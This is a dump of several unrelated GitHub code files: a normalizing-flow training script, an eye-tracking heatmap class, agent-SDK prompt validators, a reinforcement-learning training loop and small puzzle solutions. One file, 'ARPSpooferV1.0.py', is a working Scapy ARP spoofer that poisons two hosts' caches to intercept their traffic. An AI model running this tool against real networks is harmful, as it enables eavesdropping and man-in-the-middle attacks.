use_residual_blocks=True,\n random_mask=False,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n )\n elif args.base_transform_type == 'quadratic-autoregressive':\n return transforms.MaskedPiecewiseQuadraticAutoregressiveTransform(\n features=features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_bins=args.num_bins,\n tails='linear',\n tail_bound=args.tail_bound,\n num_blocks=args.num_transform_blocks,\n use_residual_blocks=True,\n random_mask=False,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n )\n elif args.base_transform_type == 'rq-autoregressive':\n return transforms.MaskedPiecewiseRationalQuadraticAutoregressiveTransform(\n features=features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_bins=args.num_bins,\n tails='linear',\n tail_bound=args.tail_bound,\n num_blocks=args.num_transform_blocks,\n use_residual_blocks=True,\n random_mask=False,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n )\n else:\n raise ValueError\n\ndef create_transform():\n transform = transforms.CompositeTransform([\n transforms.CompositeTransform([\n create_linear_transform(),\n create_base_transform(i)\n ]) for i in range(args.num_flow_steps)\n ] + [\n create_linear_transform()\n ])\n return transform\n\n# create model\ndistribution = distributions.StandardNormal((features,))\ntransform = create_transform()\nflow = flows.Flow(transform, distribution).to(device)\n\nn_params = utils.get_num_parameters(flow)\nprint('There are {} trainable parameters in this model.'.format(n_params))\n\n# create optimizer\noptimizer = optim.Adam(flow.parameters(), lr=args.learning_rate)\nif args.anneal_learning_rate:\n scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, args.num_training_steps, 0)\nelse:\n scheduler = None\n\n# create summary writer and write to log directory\n# timestamp = cutils.get_timestamp()\n# if cutils.on_cluster():\n# timestamp += '||{}'.format(os.environ['SLURM_JOB_ID'])\n# log_dir = os.path.join(path, args.dataset_name, timestamp)\n# while True:\n# try:\n# # writer = SummaryWriter(log_dir=log_dir, max_queue=20)\nwriter = tf.summary.create_file_writer(run_dir, max_queue=20)\nwriter.set_as_default()\n\n# break\n# except FileExistsError:\n# sleep(5)\n# filename = os.path.join(log_dir, 'config.json')\n# with 
open(filename, 'w') as file:\n# json.dump(vars(args), file)\nwith open(os.path.join(run_dir, 'args.json'), 'w') as f:\n json.dump(str(args.__dict__), f, indent=4, sort_keys=True)\n\ntbar = tqdm(range(args.num_training_steps))\nbest_val_score = -1e10\ntorch.cuda.empty_cache()\nstop_cntr = 0\nfor step in tbar:\n flow.train()\n if args.anneal_learning_rate:\n scheduler.step(step)\n optimizer.zero_grad()\n\n batch = next(train_generator)[0].to(device)\n log_density = flow.log_prob(batch)\n loss = - torch.mean(log_density)\n loss.backward()\n if args.grad_norm_clip_value is not None:\n clip_grad_norm_(flow.parameters(), args.grad_norm_clip_value)\n optimizer.step()\n\n tf.summary.scalar(name='loss', data=loss.item(), step=step)\n\n ## option #1 for val monitoring\n flow.eval()\n with torch.no_grad():\n val_batch = next(val_generator)\n log_density_val = flow.log_prob(val_batch[0].to(device).detach())\n mean_log_density_val = torch.mean(log_density_val).detach()\n running_val_log_density = mean_log_density_val.cpu().numpy()\n\n test_batch = next(test_generator)\n log_density_test = flow.log_prob(test_batch[0].to(device).detach())\n mean_log_density_test = torch.mean(log_density_test).detach()\n running_test_log_density = mean_log_density_test.cpu().numpy()\n\n cont_batch = next(cont_generator)\n log_density_cont = flow.log_prob(cont_batch[0].to(device).detach())\n mean_log_density_cont = torch.mean(log_density_cont).detach()\n running_cont_log_density = mean_log_density_cont.cpu().numpy()\n\n if running_val_log_density > best_val_score:\n best_val_score = running_val_log_density\n stop_cntr = 0\n if step > args.step_lim:\n model_holder = flow.cpu().state_dict().copy()\n flow.cuda().state_dict()\n else:\n stop_cntr += 1\n if stop_cntr > args.stop_cntr:\n break\n\n # ## option #2 for val monitoring\n # if (step + 1) % args.monitor_interval == 0:\n # flow.eval()\n #\n # with torch.no_grad():\n # # compute validation score\n # running_val_log_density = 0\n # for val_batch in val_loader:\n # log_density_val = flow.log_prob(val_batch[0].to(device).detach())\n # mean_log_density_val = torch.mean(log_density_val).detach()\n # running_val_log_density += mean_log_density_val.cpu().numpy()\n # running_val_log_density /= len(val_loader)\n #\n # ####### save best model #### don't use if want to run faster...or wait until reaching a certain best score\n # if running_val_log_density > best_val_score:\n # best_val_score = running_val_log_density\n # stop_cntr = 0\n # if step > args.step_lim:\n # model_holder = flow.cpu().state_dict().copy()\n # flow.cuda().state_dict()\n # with torch.no_grad():\n # running_test_log_density = 0\n # for test_batch in test_loader:\n # log_density_test = flow.log_prob(test_batch[0].to(device).detach())\n # mean_log_density_test = torch.mean(log_density_test).detach()\n # running_test_log_density += mean_log_density_test.cpu().numpy()\n # running_test_log_density /= len(test_loader)\n # running_cont_log_density = 0\n # for cont_batch in cont_loader:\n # log_density_cont = flow.log_prob(cont_batch[0].to(device).detach())\n # mean_log_density_cont = torch.mean(log_density_cont).detach()\n # running_cont_log_density += mean_log_density_cont.cpu().numpy()\n # running_cont_log_density /= len(cont_loader)\n # else:\n # stop_cntr+= 1\n # if stop_cntr > args.stop_cntr:\n # break\n # # path_ = os.path.join(cutils.get_checkpoint_root(),\n # # '{}-best-val-{}.t'.format(args.dataset_name, timestamp))\n # path_ = os.path.join(run_dir,\n # '{}-best-val-{}.t'.format(args.dataset_name, 
timestamp))\n # torch.save(flow.state_dict(), path_)\n\n # compute reconstruction\n # with torch.no_grad():\n # test_batch_noise = flow.transform_to_noise(test_batch)\n # test_batch_reconstructed, _ = flow._transform.inverse(test_batch_noise)\n # errors = test_batch - test_batch_reconstructed\n # max_abs_relative_error = torch.abs(errors / test_batch).max()\n # average_abs_relative_error = torch.abs(errors / test_batch).mean()\n # tf.summary.scalar('max-abs-relative-error',\n # max_abs_relative_error.cpu().numpy(), step=step)\n # tf.summary.scalar('average-abs-relative-error',\n # average_abs_relative_error.cpu().numpy(), step=step)\n\n # summaries = {\n # 'val': running_val_log_density.item(),\n # 'best-val': best_val_score.item(),\n # 'max-abs-relative-error': max_abs_relative_error.item(),\n # 'average-abs-relative-error': average_abs_relative_error.item()\n # }\n summaries = {\n 'val': running_val_log_density,\n 'best-val': best_val_score,\n 'test': running_test_log_density,\n 'cont_data': running_cont_log_density\n # 'max-abs-relative-error': max_abs_relative_error,\n # 'average-abs-relative-error': average_abs_relative_error\n }\n for summary, value in summaries.items():\n tf.summary.scalar(name=summary, data=value, step=step)\n\n\n####### load best val model\n# path = os.path.join(cutils.get_checkpoint_root(),\n# '{}-best-val-{}.t'.format(args.dataset_name, timestamp))\nflow.load_state_dict(model_holder)\npath_ = os.path.join(run_dir,\n '{}-best-val-{}.t'.format(args.dataset_name, timestamp))\ntorch.save(model_holder, path_)\n# flow.load_state_dict(torch.load(path_))\n# flow.eval()\n# calculate log-likelihood on test set\nwith torch.no_grad():\n log_likelihood = torch.Tensor([])\n for batch in tqdm(test_loader):\n log_density = flow.log_prob(batch[0].to(device))\n log_likelihood = torch.cat([\n log_likelihood,\n log_density\n ])\n# calculate log-likelihood on contrastive set\nwith torch.no_grad():\n log_likelihood_cont = torch.Tensor([])\n for batch in tqdm(cont_loader):\n log_density = flow.log_prob(batch[0].to(device))\n log_likelihood_cont = torch.cat([\n log_likelihood_cont,\n log_density\n ])\n\npath_ = os.path.join(run_dir, '{}-{}-log-likelihood.npy'.format(\n args.dataset_name,\n args.base_transform_type\n))\nnp.save(path_, utils.tensor2numpy(log_likelihood))\nmean_log_likelihood = log_likelihood.mean()\nstd_log_likelihood = log_likelihood.std()\n\n# save log-likelihood\ns = 'Final score for {}: {:.2f} +- {:.2f}'.format(\n args.dataset_name.capitalize(),\n mean_log_likelihood.item(),\n 2 * std_log_likelihood.item() / np.sqrt(len(test_dataset))\n)\nprint(s)\nfilename = os.path.join(run_dir, 'test-results.txt')\nwith open(filename, 'w') as file:\n file.write(s)\n","repo_name":"johnpjust/nsf","sub_path":"experiments/uci.py","file_name":"uci.py","file_ext":"py","file_size_in_byte":23743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"30195881348","text":"import scapy.all as scapy\nfrom time import sleep\nfrom argparse import ArgumentParser\n\ndef get_arguments():\n parser = ArgumentParser()\n parser.add_argument(\"-i1\", \"--target-ip\", required=True, help=\"Target IP\", \n metavar=\"T.IP\", dest=\"ip1\")\n\n parser.add_argument(\"-i2\", \"--source-ip\", required=True, help=\"Source IP\",\n metavar=\"S.IP\", dest=\"ip2\")\n \n args = parser.parse_args()\n return args\n\ndef spoof(target_ip, source_ip):\n target_mac = scapy.srp(scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")/scapy.ARP(pdst=target_ip), \n timeout=1, 
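# added note: srp() returns (answered, unanswered); each answered entry is a (sent, received) pair, and received.hwsrc is the replying host's MAC\n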
verbose=False)[0]\n # bug fix below: .hwsrc extracts the MAC address string from the reply packet instead of passing the packet object itself\n scapy.send(scapy.ARP(op=2, psrc=source_ip, pdst=target_ip, hwdst=target_mac[0][1].hwsrc), \n count=4, verbose=False)\n\ndef restore(dest_ip, source_ip):\n dest_mac = scapy.srp(scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")/scapy.ARP(pdst=dest_ip),\n timeout=1, verbose=False)[0][0][1].hwsrc\n source_mac = scapy.srp(scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")/scapy.ARP(pdst=source_ip),\n timeout=1, verbose=False)[0][0][1].hwsrc\n scapy.send(scapy.ARP(op=2, psrc=source_ip, pdst=dest_ip, hwsrc=source_mac, hwdst=dest_mac), \n count=4, verbose=False)\n\nif __name__ == \"__main__\":\n spc = 0\n args = get_arguments()\n try:\n print(\"Starting ARP Spoofing\")\n while True:\n spoof(str(args.ip1), str(args.ip2))\n spoof(str(args.ip2), str(args.ip1))\n print(\"\\rSent Packages: \", str(spc), end=\"\")\n spc += 2\n sleep(1)\n except KeyboardInterrupt:\n print(\"\\n\\nDetected CTRL + C, stopping ARP Spoofing and restoring ARP tables\")\n restore(str(args.ip1), str(args.ip2))\n restore(str(args.ip2), str(args.ip1))\n except:\n print(\"\\n\\nAn unexpected error has occurred\\n\")\n","repo_name":"TheCaustic-X/My_Python_Things","sub_path":"Hacking/ARPSpooferV1.0.py","file_name":"ARPSpooferV1.0.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
+{"seq_id":"42200417921","text":"import sys\nimport os\n\n\n# Commands\nimport commands.add as ADD\nimport commands.list as LIST\nimport commands.rm as RM\nimport commands.run as RUN\nimport commands.getConfig as GET\nimport commands.show as SHOW\nimport commands.init as INIT\n\nCOMMAND = sys.argv[1]\nhelpText = \"\"\"🔜 Soon to be implemented\"\"\"\n\nif __name__ == '__main__':\n \n \n if COMMAND == 'h' or COMMAND == 'help':\n print(helpText)\n elif COMMAND == 'init':\n INIT.init()\n\n elif COMMAND == 'install':\n ADD.add(sys.argv[2])\n \n\n elif COMMAND == 'rm' or COMMAND == 'remove':\n RM.rm(sys.argv[2])\n \n elif COMMAND == 'list' or COMMAND == 'ls':\n LIST.list()\n \n elif COMMAND == 'update' or COMMAND == 'u':\n print('🔜 Soon to be implemented')\n \n elif COMMAND == 'show':\n SHOW.show(sys.argv[2])\n \n elif COMMAND == 'r' or COMMAND == 'run':\n RUN.run(sys.argv[2])\n\n \n \n else:\n print('❌ Unknown command')\n","repo_name":"katistix/bpm","sub_path":"bpm.py","file_name":"bpm.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
+{"seq_id":"11740525791","text":"import os\nimport argparse\nimport csv\nimport numpy\nimport matplotlib\nfrom matplotlib import pyplot, image\n\n\nclass Heatmap:\n\n def draw_display(self, dispsize, imagefile=None):\n # construct screen (black background)\n screen = numpy.zeros((dispsize[1], dispsize[0], 3), dtype='float32')\n # if an image location has been passed, draw the image\n if imagefile != None:\n # check if the path to the image exists\n if not os.path.isfile(imagefile):\n raise Exception(\"ERROR in draw_display: imagefile not found at '%s'\" % imagefile)\n # load image\n img = image.imread(imagefile)\n\n # width and height of the image\n w, h = len(img[0]), len(img)\n # x and y position of the image on the display\n x = int(dispsize[0] / 2 - w / 2)\n y = int(dispsize[1] / 2 - h / 2)\n # draw the image on the screen\n screen[y:y + h, x:x + w, :] += img\n # dots per inch\n dpi = 100.0\n # determine the figure size in inches\n figsize = (dispsize[0] / dpi, dispsize[1] / dpi)\n # create a figure\n fig = pyplot.figure(figsize=figsize, dpi=dpi, frameon=False)\n ax 
= pyplot.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n # plot display\n ax.axis([0, dispsize[0], 0, dispsize[1]])\n ax.imshow(screen) # , origin='upper')\n\n return fig, ax\n\n def gaussian(self, x, sx, y=None, sy=None):\n # square Gaussian if only x values are passed\n if y == None:\n y = x\n if sy == None:\n sy = sx\n # centers\n xo = x / 2\n yo = y / 2\n # matrix of zeros\n M = numpy.zeros([y, x], dtype=float)\n # gaussian matrix\n for i in range(x):\n for j in range(y):\n M[j, i] = numpy.exp(\n -1.0 * (((float(i) - xo) ** 2 / (2 * sx * sx)) + ((float(j) - yo) ** 2 / (2 * sy * sy))))\n\n return M\n\n def draw(self, gazepoints, dispsize, imagefile=None, alpha=0.5, savefilename=None, gaussianwh=200, gaussiansd=None):\n # IMAGE\n fig, ax = self.draw_display(dispsize, imagefile=imagefile)\n\n # HEATMAP\n # Gaussian\n gwh = gaussianwh\n gsdwh = gwh / 6 if (gaussiansd is None) else gaussiansd\n gaus = self.gaussian(gwh, gsdwh)\n # matrix of zeroes\n strt = int(gwh / 2)\n heatmapsize = dispsize[1] + 2 * strt, dispsize[0] + 2 * strt\n heatmap = numpy.zeros(heatmapsize, dtype=float)\n # create heatmap\n for i in range(0, len(gazepoints)):\n # get x and y coordinates\n x = strt + int(gazepoints[i][0]) - int(gwh / 2)\n y = strt + int(gazepoints[i][1]) - int(gwh / 2)\n # correct Gaussian size if either coordinate falls outside of\n # display boundaries\n if (not 0 < x < dispsize[0]) or (not 0 < y < dispsize[1]):\n hadj = [0, gwh];\n vadj = [0, gwh]\n if 0 > x:\n hadj[0] = abs(x)\n x = 0\n elif dispsize[0] < x:\n hadj[1] = gwh - int(x - dispsize[0])\n if 0 > y:\n vadj[0] = abs(y)\n y = 0\n elif dispsize[1] < y:\n vadj[1] = gwh - int(y - dispsize[1])\n # add adjusted Gaussian to the current heatmap\n try:\n heatmap[y:y + vadj[1], x:x + hadj[1]] += gaus[vadj[0]:vadj[1], hadj[0]:hadj[1]] * 1\n except:\n # fixation was probably outside of display\n pass\n else:\n # add Gaussian to the current heatmap\n heatmap[y:y + gwh, x:x + gwh] += gaus * 1\n # resize heatmap\n heatmap = heatmap[strt:dispsize[1] + strt, strt:dispsize[0] + strt]\n # remove zeros\n lowbound = numpy.mean(heatmap[heatmap > 0])\n heatmap[heatmap < lowbound] = numpy.NaN\n # draw heatmap on top of image\n ax.imshow(heatmap, cmap='jet', alpha=alpha)\n\n # FINISH PLOT\n # invert the y axis, as (0,0) is top left on a display\n ax.invert_yaxis()\n # save the figure if a file name was provided\n if savefilename != None:\n fig.savefig(savefilename)\n\n return fig\n","repo_name":"ddetommaso/TobiiGlassesPySuite","sub_path":"tobiiglasses/aoi/heatmaps.py","file_name":"heatmaps.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"76"} +{"seq_id":"4319028368","text":"import enum\nimport inspect\nimport re\nfrom typing import TYPE_CHECKING, Callable, get_type_hints\nfrom unittest import mock\n\nif TYPE_CHECKING:\n from fixieai.agents import api\n from fixieai.agents import code_shot\nelse:\n api = mock.MagicMock()\n code_shot = mock.MagicMock()\n\n\ndef strip_prompt_lines(agent_metadata: code_shot.AgentMetadata):\n \"\"\"Strips all prompt lines.\"\"\"\n agent_metadata.base_prompt = _strip_all_lines(agent_metadata.base_prompt)\n for i, fewshot in enumerate(agent_metadata.few_shots):\n agent_metadata.few_shots[i] = _strip_all_lines(fewshot)\n\n\ndef validate_code_shot_agent(agent_metadata: code_shot.AgentMetadata):\n \"\"\"A client-side validation of few_shots and agent.\"\"\"\n _validate_base_prompt(agent_metadata.base_prompt)\n for fewshot in 
agent_metadata.few_shots:\n _validate_few_shot_prompt(fewshot)\n\n\ndef validate_registered_pyfunc(func: Callable, agent: code_shot.CodeShotAgent):\n \"\"\"Validates `func`'s signature to be a valid CodeShot Func.\n\n Args:\n func: The function to be validated.\n agent: The CodeShotAgent that this func is going to be registered for.\n \"\"\"\n # Delayed import to avoid circular dependency\n from fixieai.agents import api\n from fixieai.agents import oauth\n from fixieai.agents import user_storage\n\n ALLOWED_FUNC_PARAMS = {\n \"query\": api.Message,\n \"user_storage\": user_storage.UserStorage,\n \"oauth_handler\": oauth.OAuthHandler,\n }\n\n # Validate that func is a function type.\n if not inspect.isfunction(func):\n raise TypeError(\n f\"Registered function {func!r} is not a function, but a {type(func)!r}.\"\n )\n signature = inspect.signature(func)\n func_name = func.__name__\n params = signature.parameters\n\n # Validate that there are not var args (*args or **kwargs).\n if any(\n param.kind in (param.VAR_KEYWORD, param.VAR_POSITIONAL)\n for param in params.values()\n ):\n raise TypeError(\n f\"Registered function {func_name} cannot accept variable args: {params!r}.\"\n )\n\n # Validate that all argument names are known.\n unknown_params = set(params.keys()) - set(ALLOWED_FUNC_PARAMS.keys())\n if unknown_params:\n raise TypeError(\n f\"Registered function {func_name} gets unknown arguments {unknown_params}. \"\n f\"List of allowed Func arguments are {list(ALLOWED_FUNC_PARAMS.keys())}.\"\n )\n\n # Check the type annotations match what's expected, if func is type annotated.\n type_hints = get_type_hints(func)\n for arg_name, arg_type in ALLOWED_FUNC_PARAMS.items():\n if arg_name in type_hints and type_hints[arg_name] != arg_type:\n raise TypeError(\n f\"Expected argument {arg_name!r} to be of type {arg_type!r}, but it's \"\n f\"typed as {type_hints[arg_name]!r}.\"\n )\n if \"return\" in type_hints and type_hints[\"return\"] not in (\n api.AgentResponse,\n api.Message,\n str,\n ):\n raise TypeError(\n f\"Expected registered function to return an AgentResponse, a Message, \"\n f\"or str but it returns {type_hints['return']}.\"\n )\n\n # Some custom checks.\n if \"oauth_handler\" in params and agent.oauth_params is None:\n raise TypeError(\n f\"Function {func_name} who accepts 'oauth_handler' as an argument cannot \"\n f\"be registered with agent {agent!r} who hasn't set 'oauth_params' in its \"\n \"constructor.\"\n )\n\n return func\n\n\ndef _strip_all_lines(prompt: str) -> str:\n prompt = prompt.strip()\n return \"\\n\".join(line.strip() for line in prompt.splitlines())\n\n\ndef _validate_base_prompt(base_prompt: str):\n if base_prompt.endswith(\"\\n\") or base_prompt.startswith(\"\\n\"):\n raise ValueError(\n \"base_prompt should not start or end in newlines. 
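The `validate_registered_pyfunc` helper above is a compact reference for runtime signature checking: it rejects `*args`/`**kwargs`, whitelists parameter names, and compares `typing.get_type_hints` output against expected types. A minimal self-contained sketch of the same pattern — the allow-list, function and type names below are hypothetical, not taken from the SDK:

```python
import inspect
from typing import get_type_hints

# Hypothetical allow-list: parameter name -> required annotation.
ALLOWED = {"query": str, "limit": int}

def check_func(func):
    """Validate a callback's signature against ALLOWED (sketch, stdlib only)."""
    params = inspect.signature(func).parameters
    # Reject variadic parameters, mirroring the check in the record above.
    if any(p.kind in (p.VAR_POSITIONAL, p.VAR_KEYWORD) for p in params.values()):
        raise TypeError(f"{func.__name__} must not accept *args/**kwargs")
    unknown = set(params) - set(ALLOWED)
    if unknown:
        raise TypeError(f"{func.__name__} has unknown parameters: {unknown}")
    # Compare annotations only where they are present.
    hints = get_type_hints(func)
    for name, expected in ALLOWED.items():
        if name in hints and hints[name] is not expected:
            raise TypeError(f"{name!r} must be annotated as {expected!r}")
    return func

@check_func
def handler(query: str, limit: int) -> str:
    return query[:limit]
```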
\"\n f\"base_prompt={base_prompt!r}.\"\n )\n whitespaces = (\" \", \"\\t\", \"\\r\")\n prompt_lines = base_prompt.split(\"\\n\")\n bad_lines = [\n line\n for line in prompt_lines\n if line.startswith(whitespaces) or line.endswith(whitespaces)\n ]\n if bad_lines:\n raise ValueError(\n f\"Some lines in the base prompt start or end in whitespaces: {bad_lines!r}.\"\n )\n\n\nclass FewshotLinePattern(enum.Enum):\n QUERY = re.compile(r\"^Q:\")\n AGENT_SAYS = re.compile(r\"^Agent\\[\\w+] says:\")\n FUNC_SAYS = re.compile(r\"^Func\\[\\w+] says:\")\n ASK_AGENT = re.compile(r\"^Ask Agent\\[\\w+]:\")\n ASK_FUNC = re.compile(r\"^Ask Func\\[\\w+]:\")\n RESPONSE = re.compile(r\"^A:\")\n NO_PATTERN: None = None\n\n @classmethod\n def pattern(cls, line: str) -> \"FewshotLinePattern\":\n \"\"\"Returns the matched PromptPattern for a given line.\"\"\"\n if \"\\n\" in line:\n raise ValueError(\n \"Cannot get the pattern for a multi-line text. Patterns must be \"\n \"extracted one line at a time.\"\n )\n pattern_matches = [\n prompt_pattern\n for prompt_pattern in cls\n if prompt_pattern is not cls.NO_PATTERN and prompt_pattern.value.match(line)\n ]\n if len(pattern_matches) > 1:\n raise RuntimeError(\n f\"More than one pattern ({pattern_matches}) matched the line {line!r}.\"\n )\n elif len(pattern_matches) == 1:\n return pattern_matches[0]\n else:\n return cls.NO_PATTERN\n\n\ndef _validate_few_shot_prompt(prompt: str):\n \"\"\"Validates 'prompt' as a correctly formatted few shot prompt.\"\"\"\n lines = prompt.splitlines(False)\n\n # Check that no line starts or ends in a whitespace.\n whitespaces = (\" \", \"\\t\", \"\\r\")\n bad_lines = [\n line\n for line in lines\n if line.startswith(whitespaces) or line.endswith(whitespaces)\n ]\n _assert(\n not bad_lines,\n f\"Some lines in the fewshot start or end in whitespaces: {bad_lines!r}.\",\n prompt,\n )\n\n # Check that it doesn't end with newline\n _assert(not prompt.endswith(\"\\n\"), \"Fewshot ends with newline.\", prompt)\n\n # Check that fewshot starts with a Q:, ends in an A:, and a Func says and Agent\n # says follows every Ask Func and Ask Agent.\n lines_patterns = [FewshotLinePattern.pattern(line) for line in lines]\n _assert(\n lines_patterns[0] is FewshotLinePattern.QUERY,\n \"Fewshot must start with a 'Q:'\",\n prompt,\n )\n last_pattern = FewshotLinePattern.QUERY\n for i, pattern in enumerate(lines_patterns):\n if pattern is FewshotLinePattern.ASK_AGENT:\n _assert(\n i + 1 < len(lines_patterns)\n and lines_patterns[i + 1] is FewshotLinePattern.AGENT_SAYS,\n \"Each 'Ask Agent' line must be followed by an 'Agent says' line.\",\n prompt,\n )\n if pattern is FewshotLinePattern.ASK_FUNC:\n _assert(\n i + 1 < len(lines_patterns)\n and lines_patterns[i + 1] is FewshotLinePattern.FUNC_SAYS,\n \"Each 'Ask Func' line must be followed by an 'Func says' line.\",\n prompt,\n )\n if pattern is not FewshotLinePattern.NO_PATTERN:\n last_pattern = pattern\n _assert(\n last_pattern is FewshotLinePattern.RESPONSE,\n f\"Fewshot must end with a 'A:' pattern, but it ends with {last_pattern}\",\n prompt,\n )\n\n # Check that there's Q: and A: lines are interleaved.\n all_qa_lines = [\n \"Q\" if pattern is FewshotLinePattern.QUERY else \"A\"\n for pattern in lines_patterns\n if pattern in (FewshotLinePattern.QUERY, FewshotLinePattern.RESPONSE)\n ]\n qa_str = \"\".join(all_qa_lines)\n _assert(\n qa_str.replace(\"QA\", \"\") == \"\",\n \"Q: and A: lines must be interleaved in fewshot.\",\n prompt,\n )\n\n\ndef _assert(condition: bool, msg: str, prompt: str):\n if not 
condition:\n raise ValueError(f\"{msg} in few-shot prompt: {prompt!r}.\")\n","repo_name":"rravipra/fixie-sdk","sub_path":"fixieai/agents/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"25551959500","text":"import pandas as pd\nimport intraday_environment\nfrom sac_tf2 import Agent\nfrom tf_agents.environments import tf_py_environment\nimport matplotlib.pyplot as plt\n\nn_episodes = 10000\n\n# Environment\nSOC = 50\ndf = pd.read_csv('test_from_11_0to_13_45.csv')\n\nenvironment = intraday_environment.IntradayEnv(df, SOC)\nenv = tf_py_environment.TFPyEnvironment(environment)\n\n# Agent parameters\nn_actions = env.action_spec().shape[0]\ninput_dims = env.observation_spec().shape\nmax_action = env.action_spec().maximum.max()\n\n# Initialize agent\nagent = Agent(n_actions, input_dims, max_action, batch_size=64)\n\n# Training\nscore_history = []\nvalue_loss = []\nactor_loss = []\ncritic1_loss = []\ncritic2_loss = []\n\nplt.ion()\n# fig1, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4)\n\nfor i in range(n_episodes):\n\n observation = environment.reset_new()\n done = False\n score = 0\n\n # Start the episode and run until it's finished\n while not done:\n action = agent.choose_action(observation)\n observation_, reward, done, info = environment.step_new(action)\n score = score + environment.total_revenue\n\n agent.remember(observation, action, reward, observation_, done)\n\n agent.learn()\n\n observation = observation_\n\n # Keep track of the episode's score\n score_history.append(score)\n\n # Print training info\n print(f'episode: {i}, score: {score:.2f}')\n\n if len(agent.value_loss_log):\n value_loss.append(sum(agent.value_loss_log[-environment.episode_steps:])/environment.episode_steps)\n actor_loss.append(sum(agent.actor_loss_log[-environment.episode_steps:]) / environment.episode_steps)\n critic1_loss.append(sum(agent.critic1_loss_log[-environment.episode_steps:]) / environment.episode_steps)\n critic2_loss.append(sum(agent.critic2_loss_log[-environment.episode_steps:]) / environment.episode_steps)\n\n # ax1.plot(value_loss)\n # ax2.plot(actor_loss)\n # ax3.plot(critic1_loss)\n # ax4.plot(critic2_loss)\n # plt.draw()\n # plt.pause(0.02)\n\n print(value_loss)\n print(actor_loss)\n print(critic1_loss)\n print(critic2_loss)\n\n print(score_history)\n\n# Save the model\nagent.save_models()\n\n# Plot the score curve\nfig1, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4)\nax1.plot(value_loss)\nax2.plot(actor_loss)\nax3.plot(critic1_loss)\nax4.plot(critic2_loss)\nplt.draw()\n\nx = [i for i in range(n_episodes)]\nfig = plt.figure()\nplt.plot(x, score_history)\nplt.title('Score over episodes')\nplt.ioff()\nplt.show()\n","repo_name":"mitre7/trading_agent_intraday","sub_path":"main_sac_tf2.py","file_name":"main_sac_tf2.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"39769919601","text":"class Solution:\n def score(self, nums, l, r, dp):\n if dp[l][r] != -1:\n return dp[l][r]\n if l == r:\n return nums[l]\n \n left = nums[l] - self.score(nums, l + 1, r, dp)\n right = nums[r] - self.score(nums, l, r - 1, dp)\n dp[l][r] = max(left, right)\n \n return dp[l][r]\n \n def PredictTheWinner(self, nums):\n n = len(nums)\n dp = [[-1 for _ in range(n)] for _ in range(n)]\n \n return self.score(nums, 0, n - 1, dp) >= 
0","repo_name":"amanovishnu/LeetCode","sub_path":"0486-predict-the-winner/0486-predict-the-winner.py","file_name":"0486-predict-the-winner.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"41891783462","text":"from check import timer, calls_counter\n\n\n@calls_counter\n@timer\ndef fibonacci_sum(n):\n \"\"\"\n Вычисление последней цифры суммы первых n чисел в последовательности Фибоначчи.\n В данном случае сложность O(n), но если числа будут очень большими, то сложность может увеличиться до O(n^2)\n \"\"\"\n if n <= 1:\n return n\n\n previous, current, _sum = 0, 1, 1\n\n for _ in range(n - 1):\n previous, current = current, previous + current\n _sum += current\n\n return _sum % 10\n\n\n@calls_counter\n@timer\ndef fibonacci_sum_fast(n):\n \"\"\"\n Вычисление последней цифры суммы первых n чисел в последовательности Фибоначчи.\n Используем оператор % 60, это связано с периодичностью последних цифр суммы чисел Фибоначчи.\n После некоторого количества чисел Фибоначчи, последние цифры начинают повторяться в циклическом порядке.\n Этот цикл имеет длину 60.\n Представьте, что вы считаете сумму первых 1000 чисел Фибоначчи. Вместо того чтобы действительно выполнять вычисления\n для всех 1000 чисел, вы можете просто найти остаток от деления 1000 на 60, что равно 40. Теперь вы знаете, что\n последняя цифра суммы первых 1000 чисел Фибоначчи также будет последней цифрой суммы первых 40 чисел Фибоначчи.\n Сложность O(n), даже если числа будут очень большими.\n \"\"\"\n if n <= 1:\n return n\n\n lesser = (n + 2) % 60\n\n if lesser == 1:\n return 0\n elif lesser == 0:\n return 9\n\n a, b = 0, 1\n for _ in range(2, lesser + 1):\n c = a + b\n c = c % 10\n b, a = c, b\n\n if c != 0:\n return c - 1\n else:\n return 9\n\n\nif __name__ == '__main__':\n n = int(input('Введите число для вычисления Фибоначчи: '))\n print(fibonacci_sum(n))\n print('***************************************************************************************************')\n print(fibonacci_sum_fast(n))\n","repo_name":"horonzhin/algorithms","sub_path":"courses/algorithmic_toolbox_coursera/week2_algorithmic_warmup/6_last_digit_of_the_sum_of_fibonacci_numbers_frequency_60.py","file_name":"6_last_digit_of_the_sum_of_fibonacci_numbers_frequency_60.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20209861669","text":"# Problem Link https://leetcode.com/problems/missing-number/\n\ndef missing_numbers(nums):\n nums = set(nums)\n n = len(nums)\n\n for i in range(n+1):\n if i not in nums:\n return i\n\n\nprint(missing_numbers([0,1]))\n","repo_name":"hasinur1997/leetconde","sub_path":"268. Missing Number.py","file_name":"268. Missing 